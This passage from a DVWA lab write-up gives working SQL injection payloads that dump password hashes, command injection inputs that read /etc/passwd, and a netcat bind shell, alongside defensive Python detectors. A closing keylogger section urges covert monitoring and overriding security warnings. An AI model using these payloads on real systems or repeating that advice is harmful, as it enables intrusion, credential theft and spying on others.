For this step, we will print all the tables whose name starts with the
prefix user, as stored in the information_schema. Enter the SQL code below in
the User ID field.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Step 9: Display all the column fields in the information_schema users table
We will print all the columns present in the users table. This information
will include column information like User_ID, first_name, last_name, user,
and password. Enter the input below in the User ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #


Step 10: Display Column field contents
To display all the necessary authentication information present in the
columns as stored in the information_schema, use the SQL syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
From the image above, you can see the password was returned in its hashed
format. To extract the password, copy the MD5 hash and use applications
like John the Ripper to crack it. There are also sites available on the internet
where you can paste the hash and if lucky, you will be able to extract the
password.
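The steps above show what the requests look like from the attacker's side; a defender sees the same payloads in the web server's access log. The following added example (written for this page, not taken from DVWA or the original article) decodes the query string of constructed Apache-style log lines once, as the application itself would, and flags the patterns used in these steps: UNION ... SELECT, references to information_schema, the ' or '1'='1 tautology (the unquoted or 1=1 form as well), and a trailing -- or # comment terminator. The log lines, the signature names and the functions classify_value and scan_log are all constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines. The id= values are the
# URL-encoded form of inputs used in the steps above plus two benign
# requests; none of these lines come from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2021:10:00:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4380 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2021:10:00:20 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+table_name+from+information_schema.tables+where+table_name+like+%27user%25%27%23&Submit=Submit HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2021:10:01:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Fields of the combined log format that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures matched against each decoded parameter value.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    # ' or '1'='1  and the unquoted  or 1=1  form
    ("tautology", re.compile(r"\bor\b\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
    # statement cut short with -- or # so the rest of the original query is ignored
    ("comment-terminator", re.compile(r"(--|#)\s*$")),
]


def classify_value(value: str) -> list:
    """Return the names of all signatures that match one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_log(text: str) -> list:
    """Parse each access-log line, URL-decode its query string once and report
    every parameter value that matches a signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; a real tool would count these
        query = urlsplit(m["target"]).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = classify_value(value)
                if hits:
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "param": param,
                        "value": value, "signatures": hits,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["time"]} {f["ip"]} param={f["param"]} {f["signatures"]}: {f["value"]!r}')
```

The benign id=1 request and the index page produce no finding, the always-true input from Step 3 trips the tautology signature, and the Step 8 input trips three signatures at once. The detector decodes only once on purpose; an attacker who double-encodes a payload relies on the application decoding twice, so a production rule set would also decode repeatedly until the value stops changing.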
 

Conclusion:
From the various examples listed in this article, SQL injection proves to be a
critical vulnerability that can exist in a system. Not only can attackers exploit
it to reveal user or customer information, but it can also be used to corrupt
the entire database thus bringing the whole system down. As of writing this
post (2021), Injection is listed as the number one vulnerability in the OWASP
Top 10 Vulnerabilities summary. The DVWA acts as a reliable resource for
both penetration testers who want to improve their skills and web
developers who want to develop systems with security in mind.
PRACTICAL - 8
Aim: Examine Command Execution attack in DVWA
Command Execution or Command Injection is an attack whose goal is the
execution of arbitrary commands on the host operating system via a
vulnerable application. Command injection attacks are possible when an
application passes unsafe user-supplied data (forms, cookies, HTTP headers,
etc.) to a system shell.

Low

If we check the source code for the low level, we can see that the code
does not check whether $target matches an IP address, and there is no
filtering of special characters. In Unix/Linux, ; allows commands to be
separated:

127.0.0.1; ls -la /root - lists all the files in the root directory.
127.0.0.1 ; cat /etc/passwd | tee /tmp/passwd - displays the contents of
/etc/passwd on the web page and also copies the contents of /etc/passwd to
the /tmp directory.

Alternatives to ;

&& - AND operator

| - PIPE operator - completely removes the IP address from the output.

Medium

Viewing the source code, we see that a blacklist has been set to exclude &&
and ;. As noted above, we can use | as a replacement:

127.0.0.1| cat /etc/passwd. A double || can also be used.

High

Viewing the source code, a more extensive blacklist has been set. This is
slightly trickier; however, the answer is in the source, '| ' => '' - note
that there is a space after the | character. If we try | pwd, no output is
returned; however, if we use |pwd, without the space, the filter does not
match and the command runs, as shown below:
Bind Shell

192.168.1.147; /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe - creates a
netcat listener; then use nc 192.168.1.147 4444 to connect. (Change the IP
addresses to match those of the target machine.)

Points to note:

1. Ensure you are using commands specific to the target you are trying to
attack; all of the above are Linux commands, Windows commands will be
different.
2. Try commands with and without a space between them.
3. You will not always have access to the source code.

OWASP:
https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)
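The three levels above differ only in what they strip from $target before handing it to the shell. The following added example (written for this page, not DVWA's own source) models those blacklists in Python, checks which of the inputs from the exercise still carry shell metacharacters after filtering, and sets a hardened version beside them: the target must parse as an IP address (an allowlist) and the command is built as an argv list with no shell, so nothing in the input is ever interpreted by /bin/sh. Only the blacklist entries the text names (&& and ; at medium, '| ' at high) are modelled; BLACKLISTS, still_injectable, validate_target, build_ping_argv and run_ping are names chosen for this example.

```python
import ipaddress
import re
import subprocess

# The blacklists as the exercise describes them (DVWA's real lists are
# longer; only the entries the text mentions are modelled here).
BLACKLISTS = {
    "low": [],
    "medium": ["&&", ";"],
    "high": ["&&", ";", "| "],  # note the space after the pipe
}

# Characters that let a second command ride along once the string reaches a shell.
SHELL_METACHARS = re.compile(r"[;&|`$()<>\n]")


def apply_blacklist(target: str, level: str) -> str:
    """Strip the forbidden tokens the way a str_replace-style filter does."""
    for token in BLACKLISTS[level]:
        target = target.replace(token, "")
    return target


def still_injectable(target: str, level: str) -> bool:
    """True if shell metacharacters survive the filtering for this level."""
    return SHELL_METACHARS.search(apply_blacklist(target, level)) is not None


def validate_target(target: str):
    """Allowlist check: return the normalised address if the input is a valid
    IPv4/IPv6 address, otherwise None. An address with anything appended to
    it is not an address and is rejected outright."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def build_ping_argv(target: str) -> list:
    """Hardened form: the validated input becomes a single argv element."""
    ip = validate_target(target)
    if ip is None:
        raise ValueError("target must be an IP address")
    return ["ping", "-c", "3", ip]


def run_ping(target: str) -> subprocess.CompletedProcess:
    # No shell=True and no string concatenation: the argv list goes straight to
    # the kernel, so ; | && and friends are just bytes inside one argument.
    return subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    samples = [
        "127.0.0.1",
        "127.0.0.1; ls -la /root",
        "127.0.0.1| cat /etc/passwd",
        "127.0.0.1| pwd",
        "127.0.0.1|pwd",
    ]
    for level in BLACKLISTS:
        for s in samples:
            print(f"{level:6} {s!r:32} injectable={still_injectable(s, level)}")
    for s in samples:
        print(f"allowlist {s!r:32} -> {validate_target(s)}")
```

The output reproduces the exercise: the medium filter removes ; but leaves | untouched, and the high filter removes "| " but not "|pwd", so every blacklist has a gap. The allowlist has none to find, because it never asks "which characters are bad" but "is this an IP address", and a string such as 127.0.0.1|pwd simply is not one.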
PRACTICAL-9

Aim: Examine software keyloggers and hardware keyloggers

What is a keylogger?

It’s something that records keystrokes and is normally used without the
consent of the user.

You’ve probably heard that keyloggers are a bad thing. It is when used for
illegal purposes, such as having a keylogger app installed without your
knowledge via spyware. But it’s not a bad thing when you are the one who
installed it to keep track of what people are doing when using your
computer. For example, if you’re a parent who thinks your child is doing not-
so-good things on the internet, you’ll be able to find out what’s been going
on with a keylogger.

If you decide to use one, you can opt to use hardware or software.

Hardware

Above is a hardware keylogger from ThinkGeek. It connects directly to the
keyboard connector, can be hidden easily and holds up to 128k of data.
While that may not sound like much, bear in mind it's all text, so it is
actually quite a bit. Additional features include password protection and
keyword searching.

The only real drawback is that it is, as you can see, a PS/2 connector and
not USB. However, that can be easily remedied with an adapter should you
use USB.

Cost is $59.99

There are other hardware-based keyloggers out there on the internet, just
do a search for them and they’ll show up.
Software

You need not look any further than SourceForge to find freely available
keylogging applications for Windows and Linux.

Best Free Keylogger, a.k.a. BFK, is one of the better ones.

Bear in mind you do have to set up appropriate permissions for this app, and
if you use existing spyware/malware security software it may identify this
app as “dangerous”. Obviously it isn’t, so if you see the warning(s), give the
app the appropriate security “pass”.

Which is better, hardware or software?

Hardware is the better of the two because it’s not an app you can simply
disable as it requires no software. The only way to disable the hardware is to
literally unplug it.

Will either slow down my computer?

No. Either will run in the background seamlessly.
